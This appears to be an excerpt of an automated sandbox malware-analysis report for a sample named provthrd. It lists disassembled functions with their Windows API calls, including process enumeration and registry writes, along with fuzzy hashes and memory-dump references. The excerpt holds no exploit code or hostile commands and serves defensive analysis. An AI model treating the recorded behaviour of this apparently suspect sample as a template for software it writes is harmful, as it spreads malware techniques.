Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: CriticalSection$AllocateEnterHeapInitializeLeave
String ID:
API String ID: 495028619-0
Opcode ID: c05c04bd59d3803bd1287509f1f7e75638a363287035ac2b14446576c0e81156
Instruction ID: 145397013719e2512da1c4e1b179e9380ae4a496153f906815a63b1f9c4bcaec
Opcode Fuzzy Hash: c05c04bd59d3803bd1287509f1f7e75638a363287035ac2b14446576c0e81156
Instruction Fuzzy Hash: 4FE0E532942A24A2C52222557C01BDA26016B40764F2A0136FD64BB2D2E6E89CD1529E

Function 00904BA8 Relevance: 1.5, APIs: 1, Instructions: 28processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00904C02
Process32FirstW.KERNEL32(?,0000022C), ref: 00904C60

Memory Dump Source

Source File: 00000002.00000002.2728407033.0000000000901000.00000020.00001000.00020000.00000000.sdmp, Offset: 00900000, based on PE: true

Associated: 00000002.00000002.2728350113.0000000000900000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2728435540.000000000090D000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_900000_provthrd.jbxd

Yara matches

Similarity

API ID: CreateFirstProcess32SnapshotToolhelp32
String ID:
API String ID: 2353314856-0
Opcode ID: 4ff996ea9189f4092ad7be6d2ca21f21e4b3b4f5055aa7731396697ee43b3b2d
Instruction ID: e2101f494260b3490e69dd7cf176fe36e2b060ca62241796a0c49f6158ec0354
Opcode Fuzzy Hash: 4ff996ea9189f4092ad7be6d2ca21f21e4b3b4f5055aa7731396697ee43b3b2d
Instruction Fuzzy Hash: 6DF02BF07152204FE574767C988937D228D5785300F144D19E7D5E72F0E631CC909791

Function 008E27B0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

ExitProcess.KERNEL32 ref: 008E27D9

Memory Dump Source

Source File: 00000002.00000002.2728197966.00000000008E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 008E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8e1000_provthrd.jbxd

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 9c08d50046710b5175456b184130c9e6c2d446b69fd83c7ea645c7f0918f3f9d
Instruction ID: 3da8b5bf20bfb2f674754657d4094164beb1ce89139992ca4a4283b0d86eccb5
Opcode Fuzzy Hash: 9c08d50046710b5175456b184130c9e6c2d446b69fd83c7ea645c7f0918f3f9d
Instruction Fuzzy Hash: 00D05EB4D00648FFDB40EFA5D94AB5CBBB4FB05701F108164E904AB381E6701B04CB52

Function 00405F10 Relevance: 1.5, APIs: 1, Instructions: 14COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(00001024,00000000,?,00000000), ref: 00405F27

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 4b8555cac2b4701d16259b226aa7860f847c7af235e94040c1487d145025083a
Instruction ID: 97f0358e55fd8811207f3f425efd3db66fac2ddb67eb715aac3d8e5dfe8b603e
Opcode Fuzzy Hash: 4b8555cac2b4701d16259b226aa7860f847c7af235e94040c1487d145025083a
Instruction Fuzzy Hash: 86D0C972298381ABE7148B60DC06FA672E4B780706F20491DB25ACA1C0D7B4A0088615

Function 0041CA76 Relevance: 1.3, APIs: 1, Instructions: 56memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

HeapAlloc.KERNEL32(00000008,?,?,?,?,0041E3EB,00000001,00000074,?,0041AAD5), ref: 0041CACB

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: AllocHeap
String ID:
API String ID: 4292702814-0
Opcode ID: 4fdd37806deaf47ad60713ea8517e46518f7d5e46e2c558df3ae7828686b548a
Instruction ID: 4af1f3a97e2bb122d1646f5ee527feb1cf230dee4ff4452717d48875362b94b5
Opcode Fuzzy Hash: 4fdd37806deaf47ad60713ea8517e46518f7d5e46e2c558df3ae7828686b548a
Instruction Fuzzy Hash: 5B01F936A8061466D623E2652C81BDF22059F907F5F190137FD54763D6EBB88CC0819E

Function 008E1820 Relevance: 1.3, APIs: 1, Instructions: 11COMMON

Download Yara Rule

APIs

VirtualFree.KERNELBASE(?,?,?), ref: 008E182F

Memory Dump Source

Source File: 00000002.00000002.2728197966.00000000008E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 008E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8e1000_provthrd.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 466f4faf4a0c86037b8ec3ec9babe6041c2248398a30699c72776a98c4e9a75e
Instruction ID: 498713a7102ad1f5d7e19cba500ffeba058410b5f70c967dfea664a67ccd9258
Opcode Fuzzy Hash: 466f4faf4a0c86037b8ec3ec9babe6041c2248398a30699c72776a98c4e9a75e
Instruction Fuzzy Hash: 1FC04C7A11424CAB8B04DF98EC84DAB37ADBB8C610B048548BA1D87200C630FA108BA4

Non-executed Functions

Function 0044414B Relevance: 42.5, APIs: 28, Instructions: 479COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00444150
GetWindowRect.USER32(?,?), ref: 00444194
OffsetRect.USER32(?,?,?), ref: 004441AA
GetSysColor.USER32(00000006), ref: 004441C7
CreateSolidBrush.GDI32(00000000), ref: 004441D0
GetSysColor.USER32(?), ref: 004441F7
CreateSolidBrush.GDI32(00000000), ref: 004441FA
GetSysColor.USER32(?), ref: 00444221
CreateSolidBrush.GDI32(00000000), ref: 00444224
GetSystemMetrics.USER32(00000006), ref: 00444237
GetSystemMetrics.USER32(00000005), ref: 0044423E
GetSystemMetrics.USER32(00000021), ref: 00444245
GetSystemMetrics.USER32(00000020), ref: 0044424B
InflateRect.USER32(?,?,?), ref: 00444283

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: MetricsSystem$BrushColorCreateRectSolid$H_prologInflateOffsetWindow
String ID:
API String ID: 1266645593-0
Opcode ID: 057e9c92db7e866f85d20a9250f8e6b4dc6d49d5552f66e9513dcb190b465dd3
Instruction ID: 55cc73d298d115fa454f1ca7fda971d98516062813f838423e59c8a26c721941
Opcode Fuzzy Hash: 057e9c92db7e866f85d20a9250f8e6b4dc6d49d5552f66e9513dcb190b465dd3
Instruction Fuzzy Hash: 2102F372E00219AFDF11DBE4CD49EEEBBB9EF48304F14412AE505E7291DA74AA05CB64

Function 0044C12D Relevance: 42.0, APIs: 12, Strings: 12, Instructions: 47registrywindowCOMMON

Download Yara Rule

APIs

RegisterWindowMessageA.USER32(Native), ref: 0044C14B
RegisterWindowMessageA.USER32(OwnerLink), ref: 0044C154
RegisterWindowMessageA.USER32(ObjectLink), ref: 0044C15E
RegisterWindowMessageA.USER32(Embedded Object), ref: 0044C168
RegisterWindowMessageA.USER32(Embed Source), ref: 0044C172
RegisterWindowMessageA.USER32(Link Source), ref: 0044C17C
RegisterWindowMessageA.USER32(Object Descriptor), ref: 0044C186
RegisterWindowMessageA.USER32(Link Source Descriptor), ref: 0044C190
RegisterWindowMessageA.USER32(FileName), ref: 0044C19A
RegisterWindowMessageA.USER32(FileNameW), ref: 0044C1A4
RegisterWindowMessageA.USER32(Rich Text Format), ref: 0044C1AE
RegisterWindowMessageA.USER32(RichEdit Text and Objects), ref: 0044C1B8

Strings

Link Source, xrefs: 0044C174
Embedded Object, xrefs: 0044C160
Link Source Descriptor, xrefs: 0044C188
Embed Source, xrefs: 0044C16A
FileName, xrefs: 0044C192
OwnerLink, xrefs: 0044C14D
Native, xrefs: 0044C146
ObjectLink, xrefs: 0044C156
FileNameW, xrefs: 0044C19C
RichEdit Text and Objects, xrefs: 0044C1B0
Object Descriptor, xrefs: 0044C17E
Rich Text Format, xrefs: 0044C1A6

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: MessageRegisterWindow
String ID: Embed Source$Embedded Object$FileName$FileNameW$Link Source$Link Source Descriptor$Native$Object Descriptor$ObjectLink$OwnerLink$Rich Text Format$RichEdit Text and Objects
API String ID: 1814269913-2889995556
Opcode ID: 8c0b00e43b52753520812423598094fe6f0fe588039065f846d206843d56d23a
Instruction ID: c774fb18b94d0f607f240b10dc72b9f6e181d1b40f615a31d6f85641bdd9e417
Opcode Fuzzy Hash: 8c0b00e43b52753520812423598094fe6f0fe588039065f846d206843d56d23a
Instruction Fuzzy Hash: E101ADB0A407885A87307F729C4992BBEE0EEC1B11361492FD5C597652DBBC9449CFC8

Function 004481F4 Relevance: 28.8, APIs: 19, Instructions: 266windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004481F9
CreateRectRgnIndirect.GDI32(?), ref: 0044823C
CopyRect.USER32(?,?), ref: 00448252
InflateRect.USER32(?,?,?), ref: 00448268
IntersectRect.USER32(?,?,?), ref: 00448279
CreateRectRgnIndirect.GDI32(?), ref: 00448283
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 00448296
CombineRgn.GDI32(?,?,?,00000003), ref: 004482C0
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 0044830B
SetRectRgn.GDI32(?,?,?,?,?), ref: 00448328
CopyRect.USER32(?,?), ref: 00448333
InflateRect.USER32(?,?,?), ref: 00448349
IntersectRect.USER32(?,?,?), ref: 00448358
SetRectRgn.GDI32(?,?,?,?,?), ref: 0044836D
CombineRgn.GDI32(?,?,?,00000003), ref: 0044838E
CreateRectRgn.GDI32(00000000,00000000,00000000,00000000), ref: 004483A6
CombineRgn.GDI32(?,?,?,00000003), ref: 004483D0

Part of subcall function 00448181: CreateBitmap.GDI32(00000008,00000008,00000001,00000001,5!D), ref: 004481C0
Part of subcall function 00448181: CreatePatternBrush.GDI32(00000000), ref: 004481CD
Part of subcall function 00448181: DeleteObject.GDI32(00000000), ref: 004481D9

Part of subcall function 00438838: SelectClipRgn.GDI32(?,00000000), ref: 0043885A
Part of subcall function 00438838: SelectClipRgn.GDI32(?,?), ref: 00438870

Part of subcall function 00438472: SelectObject.GDI32(?,00000000), ref: 00438494
Part of subcall function 00438472: SelectObject.GDI32(?,?), ref: 004384AA

PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 00448426
PatBlt.GDI32(?,?,?,?,?,005A0049), ref: 0044847A

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: Rect$Create$Select$CombineObject$ClipCopyIndirectInflateIntersect$BitmapBrushDeleteH_prologPattern
String ID:
API String ID: 4023391435-0
Opcode ID: 2409a836a299e66457d3a834ab81db96096e48a921ec0c138ad43a03d419b69d
Instruction ID: d4b5bc6bbd20429f50f9e858c66a8a553444acd3c3e2d1b66ad0889f8afbad08
Opcode Fuzzy Hash: 2409a836a299e66457d3a834ab81db96096e48a921ec0c138ad43a03d419b69d
Instruction Fuzzy Hash: 5BA1F672900209AFCF05EFA4D995DEEBBB9FF18305F14411AF906A3251DB38AE05CB64

Function 004280A0 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 83stringCOMMON

Download Yara Rule

APIs

GetPropA.USER32(?,00000000), ref: 004280B9
GetPropA.USER32(?,00000000), ref: 004280CD
GetPropA.USER32(?,00000000), ref: 004280E1
GetPropA.USER32(?,00000000), ref: 004280F5
GetPropA.USER32(?,00000000), ref: 00428109
GetPropA.USER32(?,00000000), ref: 00428119
IsWindowUnicode.USER32(?), ref: 00428136
GetClassNameA.USER32(?,?,00000010), ref: 00428148
lstrcmpiA.KERNEL32(?,edit), ref: 00428158
SetWindowLongA.USER32(?,000000FC,?), ref: 00428168
SetPropA.USER32(?,00000000,00000000), ref: 00428179

Strings

edit, xrefs: 00428152

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: Prop$Window$ClassLongNameUnicodelstrcmpi
String ID: edit
API String ID: 4088303749-2167791130
Opcode ID: ce47cccd65b828559f573fdd02315eca174eed0392ba9605590fb6f4a23b59f7
Instruction ID: a2d7c8d61795dee10d4c0bb89501d4341537436b60c1e4137995a5a8c10ea225
Opcode Fuzzy Hash: ce47cccd65b828559f573fdd02315eca174eed0392ba9605590fb6f4a23b59f7
Instruction Fuzzy Hash: 5F21DE6A302622BEA741A738BC04EBF329C9F586447400079FC58C2161FB69CA478B7E

Function 0041203E Relevance: 15.8, APIs: 5, Strings: 4, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(version.dll,76F90AE0,00000000,00000000,?,?,00411EB9,?,?,?), ref: 0041204A
GetProcAddress.KERNEL32(00000000,GetFileVersionInfoSizeA), ref: 00412065
GetProcAddress.KERNEL32(00000000,GetFileVersionInfoA), ref: 00412072
GetProcAddress.KERNEL32(?,VerQueryValueA), ref: 00412081
FreeLibrary.KERNEL32(?,?,?,00411EB9,?,?,?), ref: 00412099

Strings

GetFileVersionInfoSizeA, xrefs: 0041205F
version.dll, xrefs: 00412045
GetFileVersionInfoA, xrefs: 0041206A
VerQueryValueA, xrefs: 00412077

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: AddressProc$Library$FreeLoad
String ID: GetFileVersionInfoA$GetFileVersionInfoSizeA$VerQueryValueA$version.dll
API String ID: 2449869053-783122509
Opcode ID: a62aab86fc1936960e38da45f28fce40c3cc2023ffb4ce54ef0c80b4d2ec115d
Instruction ID: 48863e17d8e43458d7ca3fafa8f8409454e1cd139d733b04f1df92f564837e40
Opcode Fuzzy Hash: a62aab86fc1936960e38da45f28fce40c3cc2023ffb4ce54ef0c80b4d2ec115d
Instruction Fuzzy Hash: 0B017871610319AFCB105FA9CD84A9A7BF8EB5C340B200166AA09D2291E6F89D50CB69

Function 004161E3 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 004161FA
SetMapMode.GDI32(00000000,00000003), ref: 00416205
LPtoDP.GDI32(00000000,?,00000002), ref: 0041622E
__ftol.LIBCMT ref: 00416277
__ftol.LIBCMT ref: 00416282
DPtoLP.GDI32(00000000,?,00000002), ref: 00416291
ReleaseDC.USER32(?,00000000), ref: 004162D5

Strings

W, xrefs: 004162C4

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: __ftol$ModeRelease
String ID: W
API String ID: 1379597261-655174618
Opcode ID: 2d986eaa1425ff259da1c334717ca5724ac18b6cc6a0878ccbec4f3ca5ba532d
Instruction ID: 14e5291b2962e31a5cb79e27a7dd3fc6f23e504409632be0aaac4e7bcc482c60
Opcode Fuzzy Hash: 2d986eaa1425ff259da1c334717ca5724ac18b6cc6a0878ccbec4f3ca5ba532d
Instruction Fuzzy Hash: 47415A74A01209EFCB04DF98C598AEEBBB4FF44300F12849AE8566B391C734DA50CF54

Function 0043C103 Relevance: 13.6, APIs: 9, Instructions: 111windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0043C108
GetSystemMenu.USER32(?,00000000), ref: 0043C17C
DeleteMenu.USER32(?,0000F000,00000000,00000000), ref: 0043C19A
DeleteMenu.USER32(?,0000F020,00000000), ref: 0043C1A6
DeleteMenu.USER32(?,0000F030,00000000), ref: 0043C1B2
DeleteMenu.USER32(?,0000F120,00000000), ref: 0043C1BE
DeleteMenu.USER32(?,0000F060,00000000,0000F011), ref: 0043C1E7
AppendMenuA.USER32(?,00000000,0000F060,?), ref: 0043C1F6
SetParent.USER32(?,?), ref: 0043C233

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: Menu$Delete$AppendH_prologParentSystem
String ID:
API String ID: 3391233131-0
Opcode ID: e5c96335c7528439dd7b04d42a9c84ba000a2a0b20ae7e40e7d1654a628c3bbb
Instruction ID: 903901d973df4581c4d75fc1c9c23bad2e1c64f53c7f1b85533160815c384b75
Opcode Fuzzy Hash: e5c96335c7528439dd7b04d42a9c84ba000a2a0b20ae7e40e7d1654a628c3bbb
Instruction Fuzzy Hash: 6331E731A40714BBEB205F61CC46FABBB65EF48714F108136F919BA1E2C7B8A800DB58

Function 008E14A0 Relevance: 12.2, APIs: 8, Instructions: 171COMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(0000007F), ref: 008E14DB
SetLastError.KERNEL32(0000007F), ref: 008E1507

Memory Dump Source

Source File: 00000002.00000002.2728197966.00000000008E1000.00000020.00001000.00020000.00000000.sdmp, Offset: 008E1000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8e1000_provthrd.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: bdf83c00f78ad1302a2ef4fb0cc1105f10a81cdbfb6b7a64a184c11ad712b2a5
Instruction ID: 9671ef51b189158509857b068aa5e23aaac7c39a15884950376e10323ec1d71d
Opcode Fuzzy Hash: bdf83c00f78ad1302a2ef4fb0cc1105f10a81cdbfb6b7a64a184c11ad712b2a5
Instruction Fuzzy Hash: 3D712574E00149EFDB08DF99C984BADB7B2FF59304F248598E516AB391C734AE81DB90

Function 004341C8 Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(?), ref: 004341E8
lstrcmpA.KERNEL32(?,?), ref: 004341F4
OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 00434206
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00434229
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00434231
GlobalLock.KERNEL32(00000000), ref: 0043423E
DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 0043424B
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 00434269

Part of subcall function 0043918A: GlobalFlags.KERNEL32(?), ref: 00439194
Part of subcall function 0043918A: GlobalUnlock.KERNEL32(?), ref: 004391AB
Part of subcall function 0043918A: GlobalFree.KERNEL32(?), ref: 004391B6

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 370a6c8f47aa927eeabe1333754ed91b35f6ab7a07606cb854ef5cfefb62df2b
Instruction ID: 690837d5c8d9ff036fe57c5cb54002bec64524cfffc16c2c61e71697d458aa86
Opcode Fuzzy Hash: 370a6c8f47aa927eeabe1333754ed91b35f6ab7a07606cb854ef5cfefb62df2b
Instruction Fuzzy Hash: 4311E331600604BAEB215BB6DC49EBF7BBDEFC9780F40005EFA09D1112D6B9DD009B28

Function 0040A0C0 Relevance: 10.7, APIs: 7, Instructions: 192windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 0040A111
GetMenuState.USER32(?,00000000,00000400), ref: 0040A12B
GetMenuItemCount.USER32(?), ref: 0040A2A7

Part of subcall function 0040A960: GetSubMenu.USER32(?,00000002), ref: 0040A969

GetMenuStringA.USER32(?,00000000,00000000,00000100,00000100), ref: 0040A173

Part of subcall function 0042F65E: lstrlenA.KERNEL32(?,00000100,00433FDB,000000FF,?,00000000,000000FF,00000100,?,?,?,00000100,?,?), ref: 0042F671

Part of subcall function 004094C0: ModifyMenuA.USER32(?,?,?,?,00000000), ref: 0040958C

Memory Dump Source

Source File: 00000002.00000002.2727650193.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2727623500.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727712508.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727733460.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2727841520.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_provthrd.jbxd

Similarity

API ID: Menu$CountItem$ModifyStateStringlstrlen
String ID:
API String ID: 4136268729-0
Opcode ID: d64e639c1f47dfdf0b698961a13cfd19c73fcb5aa70f6a0c081acb193ddfe4cf
Instruction ID: 1f2a9d6a2ae385d1f62075975c357f014888163f3b1c0c1c39bcdefda23c11cb
Opcode Fuzzy Hash: d64e639c1f47dfdf0b698961a13cfd19c73fcb5aa70f6a0c081acb193ddfe4cf
Instruction Fuzzy Hash: 5951C170204701AFC614EF25C995F2FB7E9AB84B54F500A2EF456A73C1DB38EC05876A

Function 0040E020 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 78windowCOMMON

Download Yara Rule

APIs

SendMessageA.USER32(?,0000101D,00000000,00000000), ref: 0040E059
SendMessageA.USER32(?,0000101D,00000001,00000000), ref: 0040E06A
SendMessageA.USER32(?,0000101D,00000002,00000000), ref: 0040E07B
SendMessageA.USER32(?,0000101D,00000003,00000000), ref: 0040E08E

Part of subcall function 0042F2C1: lstrlenA.KERNEL32(?,?,00000000,?,0040127F,INSERT INTO Connection (ConnectionName, ConnectionDate, ConnectionDuration) VALUES (?, ?, ?)), ref: 0042F2EB

Part of subcall function 0040E380: RegCreateKeyA.ADVAPI32(80000002,00000000,00000000), ref: 0040E3E9
Part of subcall function 0040E380: RegSetValueExA.ADVAPI32(?,00000000,00000000,00000000,00000001,?,?,00000000,?,753D4A40), ref: 0040E462
